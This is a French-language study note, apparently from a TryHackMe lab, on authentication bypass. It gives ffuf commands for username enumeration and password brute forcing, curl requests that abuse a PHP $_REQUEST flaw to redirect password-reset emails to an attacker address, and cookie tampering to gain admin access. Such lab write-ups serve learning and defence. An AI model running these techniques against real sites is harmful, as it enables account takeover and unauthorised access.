**Authentication Bypass**


<details><summary>Username Enumeration</summary>

En utilisant le message d'erreur "le nom d'utilisateur existe deja" sur un site, nous pouvons créer une liste de nom d'utilistateurs valide. `ffuf` se base sur les message d'erreur du gens pour chercher les noms d'utilisateurs partant d'une liste de nom habituels

    ffuf -w /usr/share/wordlists/seclists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H      "Content-Type: application/x-www-form-urlencoded" -u http://10.10.209.244/customers/signup -mr "username already exists"


Attention à **seclists** qui peut etre écrit **SecLists** sur autres systèmes


`-w` pour spécifier le fichier des noms

`-X` pour spécifier la méthode par défaut sur GET or le notre doit etre POST

`-d`  pour spécifier les données que nous allons envoyer. Dans notre exemple, nous avons les champs username, email, password et  cpassword. Nous avons défini la valeur du nom d'utilisateur sur FUZZ. Dans l'outil ffuf, le mot clé FUZZ signifie où le contenu de notre liste de mots sera inséré dans la requête.Les autres sont définis sur "x"

`-H` L'argument -H est utilisé pour ajouter des en-têtes supplémentaires à la requête

`Content-Type` Dans ce cas, nous définissons le Content-Type sur le serveur Web qui sait que nous envoyons des données de formulaire

`-u` pour spécifier l'URL

`-mr`  pour specifier le texte sur la page que nous recherchons pour valider que nous avons trouvé un nom d'utilisateur valide.

Plus sur [ffuf]( https://github.com/ffuf/ffuf)

</details>


<details><summary> Brute Force</summary>

Avec la liste de nom conçue précedemment, nous pouvons réaliser une attaque sur la page login.

    ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.209.244/customers/login -fc 200


`W1` pour spécifier la liste des noms valides

`w2` pour spécifier le worldlist

Les multiples listes de mots sont à nouveau spécifiées avec l'argument `-w` mais séparées par une virgule

`-fc` Pour une correspondance positive, nous utilisons l'argument -fc pour rechercher un code d'état HTTP autre que `200`.


</details>


<details><summary> Logic Flaw ( reset passwd fail )</summary>

Le moyen d'exploitation suivant est une fail de logic flaw dans le processus de reinitialisation de mot de passe.

Dans la deuxième étape du processus de réinitialisation de l'e-mail, le nom d'utilisateur est soumis dans un champ POST au serveur Web et l'adresse e-mail est envoyée dans la requête de chaîne de requête en tant que champ GET.

Illustrons cela en utilisant l'outil curl pour effectuer manuellement la demande au serveur Web.

    curl 'http://10.10.209.244/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert'

`H`  pour ajouter un en-tête supplémentaire à la requête.

La variable PHP $_REQUEST est un tableau qui contient les données reçues de la chaîne de requête et les données POST. Si le même nom de clé est utilisé à la fois pour la chaîne de requête et les données POST, la logique d'application de cette variable favorise les champs de données POST plutôt que la chaîne de requête, donc si nous ajoutons un autre paramètre au formulaire POST, nous pouvons contrôler où le mot de passe est réinitialisé le courrier électronique est livré.

    curl 'http://10.10.209.244/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=attacker@hacker.com'


Pour prendre le mot de passe de l'utilisateur dont le mail est spécifé dans la requette avec GET, on procède comme suit:


    curl 'http://10.10.209.244/customers/reset?email=robert@acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email={username}@customer.acmeitsupport.thm'


</details>


<details><summary>Cookie Tampering</summary>

Exemplaire de cookie:

Set-Cookie: logged_in=true; Max-Age=3600; Path=/
Set-Cookie: admin=false; Max-Age=3600; Path=/

Lorqu'on demande la connexion comme suit, on obtient un message:  Not Logged In 

    curl http://10.10.7.238/cookie-test

Modifions les paramètres:

    curl -H "Cookie: logged_in=true; admin=false" http://10.10.7.238/cookie-test

Ou/Et

    curl -H "Cookie: logged_in=true; admin=true" http://10.10.7.238/cookie-test


Cela renvoie le résultat : Connecté en tant qu'administrateur ainsi qu'un indicateur que vous pouvez utiliser pour répondre à la première question.


[crackstation]( https://crackstation.net/ ) permet d'avoir la question en claire.

</details>

lire aussi [hydra](https://tryhackme.com/resources/blog/hydra)
